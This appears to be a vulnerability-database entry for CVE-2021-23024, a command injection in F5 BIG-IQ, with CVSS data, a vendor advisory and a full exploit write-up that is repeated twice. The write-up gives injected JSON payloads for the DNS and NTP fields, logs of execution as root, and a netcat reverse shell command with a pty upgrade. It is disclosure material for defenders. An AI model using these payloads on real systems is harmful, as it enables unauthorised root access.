Description
On version 8.0.x before 8.0.0.1, and all 6.x and 7.x versions, the BIG-IQ Configuration utility has an authenticated remote command execution vulnerability in undisclosed pages. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.
Affected Software
Related
{"id": "CVE-2021-23024", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-23024", "description": "On version 8.0.x before 8.0.0.1, and all 6.x and 7.x versions, the BIG-IQ Configuration utility has an authenticated remote command execution vulnerability in undisclosed pages. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.", "published": "2021-06-10T15:15:00", "modified": "2021-09-20T13:50:00", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 9.0}, "severity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-23024", "reporter": "f5sirt@f5.com", "references": ["https://support.f5.com/csp/article/K06024431", "http://packetstormsecurity.com/files/163264/F5-BIG-IQ-VE-8.0.0-2923215-Remote-Root.html"], "cvelist": ["CVE-2021-23024"], "immutableFields": [], "lastseen": "2022-03-23T14:27:36", "viewCount": 44, "enchantments": {"dependencies": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2021-0719"]}, {"type": "f5", "idList": ["F5:K06024431"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:163264"]}, {"type": "zdt", "idList": ["1337DAY-ID-36468"]}], "rev": 4}, "score": {"value": 4.4, "vector": "NONE"}, "twitter": {"counter": 2, "modified": "2021-06-24T07:43:23", "tweets": [{"link": "https://twitter.com/GrupoICA_Ciber/status/1407973120888262658", "text": "F5\nM\u00faltiples vulnerabilidades de severidad alta en productos F5: \n\nCVE-2021-23022,CVE-2021-23024\n\nM\u00e1s info en: https://t.co/30EN1suctc?amp=1\n/hashtag/ciberseguridad?src=hashtag_click /hashtag/grupoica?src=hashtag_click /hashtag/f5?src=hashtag_click"}, {"link": "https://twitter.com/GrupoICA_Ciber/status/1407973120888262658", "text": "F5\nM\u00faltiples vulnerabilidades de severidad alta en productos F5: \n\nCVE-2021-23022,CVE-2021-23024\n\nM\u00e1s info en: https://t.co/30EN1suctc?amp=1\n/hashtag/ciberseguridad?src=hashtag_click /hashtag/grupoica?src=hashtag_click /hashtag/f5?src=hashtag_click"}]}, "backreferences": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2021-0719"]}, {"type": "f5", "idList": ["F5:K06024431"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:163264"]}, {"type": "zdt", "idList": ["1337DAY-ID-36468"]}]}, "exploitation": null, "vulnersScore": 4.4}, "_state": {"dependencies": 0}, "_internal": {}, "cna_cvss": {"cna": null, "cvss": {}}, "cpe": ["cpe:/a:f5:big-iq_centralized_management:7.1.0", "cpe:/a:f5:big-iq_centralized_management:6.1.0"], "cpe23": ["cpe:2.3:a:f5:big-iq_centralized_management:6.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-iq_centralized_management:7.1.0:*:*:*:*:*:*:*"], "cwe": ["NVD-CWE-noinfo"], "affectedSoftware": [{"cpeName": "f5:big-iq_centralized_management", "version": "6.1.0", "operator": "le", "name": "f5 big-iq centralized management"}, {"cpeName": "f5:big-iq_centralized_management", "version": "7.1.0", "operator": "le", "name": "f5 big-iq centralized management"}, {"cpeName": "f5:big-iq_centralized_management", "version": "8.0.0.1", "operator": "lt", "name": "f5 big-iq centralized management"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:f5:big-iq_centralized_management:6.1.0:*:*:*:*:*:*:*", "versionStartIncluding": "6.0.0", "versionEndIncluding": "6.1.0", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:f5:big-iq_centralized_management:7.1.0:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndIncluding": "7.1.0", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:f5:big-iq_centralized_management:8.0.0.1:*:*:*:*:*:*:*", "versionStartIncluding": "8.0.0", "versionEndExcluding": "8.0.0.1", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://support.f5.com/csp/article/K06024431", "name": "https://support.f5.com/csp/article/K06024431", "refsource": "MISC", "tags": ["Vendor Advisory"]}, {"url": "http://packetstormsecurity.com/files/163264/F5-BIG-IQ-VE-8.0.0-2923215-Remote-Root.html", "name": "http://packetstormsecurity.com/files/163264/F5-BIG-IQ-VE-8.0.0-2923215-Remote-Root.html", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}]}
{"checkpoint_advisories": [{"lastseen": "2022-02-16T19:32:41", "description": "A command injection vulnerability exists in F5 BIG-IQ. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary commands on the affected system.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-29T00:00:00", "type": "checkpoint_advisories", "title": "F5 BIG-IQ Command Injection (CVE-2021-23024)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-23024"], "modified": "2021-09-29T00:00:00", "id": "CPAI-2021-0719", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2021-06-23T16:06:18", "description": "", "cvss3": {}, "published": "2021-06-23T00:00:00", "type": "packetstorm", "title": "F5 BIG-IQ VE 8.0.0-2923215 Remote Root", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-23024"], "modified": "2021-06-23T00:00:00", "id": "PACKETSTORM:163264", "href": "https://packetstormsecurity.com/files/163264/F5-BIG-IQ-VE-8.0.0-2923215-Remote-Root.html", "sourceData": "`F5 BIG-IQ VE v8.0.0-2923215 Post-auth Remote Root RCE \n \nCVE-2021-23024 \n \n======= \nDetails \n======= \n \nIt was possible to execute commands with root privileges as an authenticated privileged user via command injection in easy-setup-test-connection. \n \nThere are two blind command injection bugs in Test DNS Connection and Test NTP Connection features, which make request to mgmt/shared/system/easy-setup-test-connection. \n \nUser accounts tested for calling the API: \n \n- Admin \n- User + Administrator Role \n \nSSH is enabled by default for the root user, but the system does not intend the admin account to gain a shell access: \n \nadmin:x:0:500:Admin User:/home/admin:/bin/false \n \nBut an admin (or a user with admin-like privileges) can elevate privileges to root and gain a shell via command injection in the web portal. \n \n===== \nRepro \n===== \n \nhttps://bigiq/ui/system/this-device/dns-ntp/dns-ntp-edit \n \nModify and replay back the dnsServerAddresses JSON field. \n \n======= \nRequest \n======= \n \nPUT /mgmt/shared/system/easy-setup-test-connection HTTP/1.1 \nX-F5-Auth-Token: eyJraW..... \n..... \n \n{\"dnsServerAddresses\":[\"$(id>/tmp/id)\"],\"ntpServerAddresses\":[]} \n \nor \n \n{\"dnsServerAddresses\":[\"8.8.8.8\"],\"ntpServerAddresses\":[\"$(whoami)\"]} \n \n======== \nResponse \n======== \n \nHTTP/1.1 400 Bad Request \nServer: webd \n..... \n \n{\"code\":400,\"message\":\"Dns $(id>/tmp/id) is not valid\\n\",\"originalRequestBody\":\"{\\\"dnsServerAddresses\\\":[\\\"$(id>/tmp/id)\\\"],\\\"ntpServerAddresses\\\":[]}\",\"referer\":\"https://bigiq/ui/system/this-device/dns-ntp/dns-ntp-edit\",\"restOperationId\":2101063,\"errorStack\":[],\"kind\":\":resterrorresponse\"} \n \nand repectively \n \n{\"code\":400,\"message\":\"NTP $(whoami) is not valid\\n\",\"originalRequestBody\":\"{\\\"dnsServerAddresses\\\":[\\\"8.8.8.8\\\"],\\\"ntpServerAddresses\\\":[\\\"$(whoami)\\\"]}\",\"referer\":\"https://bigiq/ui/system/this-device/dns-ntp/dns-ntp-edit\",\"restOperationId\":2149253,\"errorStack\":[],\"kind\":\":resterrorresponse\"} \n \n============= \nExecution Log \n============= \n \nDNS: \n \npid=7349 executed [/bin/sh -c dig +short +time=5 +tries=1 @$(id>/tmp/id) ] \npid=7351 executed [id ] \npid=7349 executed [dig +short +time=5 +tries=1 @ ] \n \n[root@big:ModuleNotLicensed::LICENSE INOPERATIVE:Standalone] config # cat /tmp/id \nuid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0 \n \nNTP: \n \npid=1288 executed [/bin/sh -c dig +short +time=5 +tries=1 @8.8.8.8 $(whoami) ] \npid=1290 executed [whoami ] \npid=1288 executed [dig +short +time=5 +tries=1 @8.8.8.8 root ] \n \n============ \nExploitation \n============ \n \nThe netcat binary with -e support is installed on the system already making a remote shell easy for demo. \n \nA command such as this will provide the connection to our client listener: \"nc 10.0.0.100 5000 -e /bin/bash\" while on the client we will drop into a root shell on the bigiq server. \n \n$ nc -l -p 5000 \n... connection receieved \n \npython -c 'import pty; pty.spawn(\"/bin/bash\")' \n \n[@big:ModuleNotLicensed::LICENSE INOPERATIVE:Standalone] restjavad # pwd \n \n/var/service/restjavad \n \n[@big:ModuleNotLicensed::LICENSE INOPERATIVE:Standalone] restjavad # id \n \nuid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0 \n \n[@big:ModuleNotLicensed::LICENSE INOPERATIVE:Standalone] restjavad # ps \n..... \n32320 ? S 0:00 su elasticsearch -s /bin/bash -c export JAVA_HOME=/usr/lib/jvm/jre-1.8.0-openjdk.x86_64;export ES_JAVA_OPTS='-Xms6000m -Xmx6000m';export ES_PATH_CONF=/var/config/rest/elasticsearch/config;exec bin/elasticsearch >/dev/null 2>&1 \n32335 tty1 S 0:00 python -c import pty; pty.spawn(\"/bin/bash\") \n32336 pts/0 Ss 0:00 /bin/bash \n \n=== \nFix \n=== \n \nhttps://support.f5.com/csp/article/K06024431 \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/163264/f5bigiq8002923215-exec.txt", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2021-12-20T01:16:20", "description": "", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-06-23T00:00:00", "type": "zdt", "title": "F5 BIG-IQ VE 8.0.0-2923215 Remote Root Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-23024"], "modified": "2021-06-23T00:00:00", "id": "1337DAY-ID-36468", "href": "https://0day.today/exploit/description/36468", "sourceData": "F5 BIG-IQ VE v8.0.0-2923215 Post-auth Remote Root RCE\n\nCVE-2021-23024\n\n=======\nDetails\n=======\n\nIt was possible to execute commands with root privileges as an authenticated privileged user via command injection in easy-setup-test-connection.\n\nThere are two blind command injection bugs in Test DNS Connection and Test NTP Connection features, which make request to mgmt/shared/system/easy-setup-test-connection.\n\nUser accounts tested for calling the API:\n\n- Admin\n- User + Administrator Role\n\nSSH is enabled by default for the root user, but the system does not intend the admin account to gain a shell access:\n\nadmin:x:0:500:Admin User:/home/admin:/bin/false\n\nBut an admin (or a user with admin-like privileges) can elevate privileges to root and gain a shell via command injection in the web portal.\n\n=====\nRepro\n=====\n\nhttps://bigiq/ui/system/this-device/dns-ntp/dns-ntp-edit\n\nModify and replay back the dnsServerAddresses JSON field.\n\n=======\nRequest\n=======\n\nPUT /mgmt/shared/system/easy-setup-test-connection HTTP/1.1\nX-F5-Auth-Token: eyJraW.....\n.....\n\n{\"dnsServerAddresses\":[\"$(id>/tmp/id)\"],\"ntpServerAddresses\":[]}\n\nor\n\n{\"dnsServerAddresses\":[\"8.8.8.8\"],\"ntpServerAddresses\":[\"$(whoami)\"]}\n\n========\nResponse\n========\n\nHTTP/1.1 400 Bad Request\nServer: webd\n.....\n\n{\"code\":400,\"message\":\"Dns $(id>/tmp/id) is not valid\\n\",\"originalRequestBody\":\"{\\\"dnsServerAddresses\\\":[\\\"$(id>/tmp/id)\\\"],\\\"ntpServerAddresses\\\":[]}\",\"referer\":\"https://bigiq/ui/system/this-device/dns-ntp/dns-ntp-edit\",\"restOperationId\":2101063,\"errorStack\":[],\"kind\":\":resterrorresponse\"}\n\nand repectively\n\n{\"code\":400,\"message\":\"NTP $(whoami) is not valid\\n\",\"originalRequestBody\":\"{\\\"dnsServerAddresses\\\":[\\\"8.8.8.8\\\"],\\\"ntpServerAddresses\\\":[\\\"$(whoami)\\\"]}\",\"referer\":\"https://bigiq/ui/system/this-device/dns-ntp/dns-ntp-edit\",\"restOperationId\":2149253,\"errorStack\":[],\"kind\":\":resterrorresponse\"}\n\n=============\nExecution Log\n=============\n\nDNS:\n\npid=7349 executed [/bin/sh -c dig +short +time=5 +tries=1 @$(id>/tmp/id) ]\npid=7351 executed [id ]\npid=7349 executed [dig +short +time=5 +tries=1 @ ]\n\n[[email\u00a0protected]:ModuleNotLicensed::LICENSE INOPERATIVE:Standalone] config # cat /tmp/id\nuid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0\n\nNTP:\n\npid=1288 executed [/bin/sh -c dig +short +time=5 +tries=1 @8.8.8.8 $(whoami) ]\npid=1290 executed [whoami ]\npid=1288 executed [dig +short +time=5 +tries=1 @8.8.8.8 root ]\n\n============\nExploitation\n============\n\nThe netcat binary with -e support is installed on the system already making a remote shell easy for demo.\n\nA command such as this will provide the connection to our client listener: \"nc 10.0.0.100 5000 -e /bin/bash\" while on the client we will drop into a root shell on the bigiq server.\n\n$ nc -l -p 5000\n... connection receieved\n\npython -c 'import pty; pty.spawn(\"/bin/bash\")'\n\n[@big:ModuleNotLicensed::LICENSE INOPERATIVE:Standalone] restjavad # pwd\n\n/var/service/restjavad\n\n[@big:ModuleNotLicensed::LICENSE INOPERATIVE:Standalone] restjavad # id\n\nuid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0\n\n[@big:ModuleNotLicensed::LICENSE INOPERATIVE:Standalone] restjavad # ps\n.....\n32320 ? S 0:00 su elasticsearch -s /bin/bash -c export JAVA_HOME=/usr/lib/jvm/jre-1.8.0-openjdk.x86_64;export ES_JAVA_OPTS='-Xms6000m -Xmx6000m';export ES_PATH_CONF=/var/config/rest/elasticsearch/config;exec bin/elasticsearch >/dev/null 2>&1\n32335 tty1 S 0:00 python -c import pty; pty.spawn(\"/bin/bash\")\n32336 pts/0 Ss 0:00 /bin/bash\n\n===\nFix\n===\n\nhttps://support.f5.com/csp/article/K06024431\n", "sourceHref": "https://0day.today/exploit/36468", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "f5": [{"lastseen": "2022-04-27T03:33:03", "description": "The BIG-IQ Configuration utility has an authenticated remote command execution vulnerability in undisclosed pages. ([CVE-2021-23024](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23024>))\n\nImpact\n\nThis vulnerability allows an authenticated admin user or a user account assigned with an administrator role and no shell access to execute arbitrary system commands as a root user.\n", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-01T20:21:00", "type": "f5", "title": "BIG-IQ vulnerability CVE-2021-23024", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-23024"], "modified": "2022-04-27T02:58:00", "id": "F5:K06024431", "href": "https://support.f5.com/csp/article/K06024431", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}]}
CVE-2021-23024
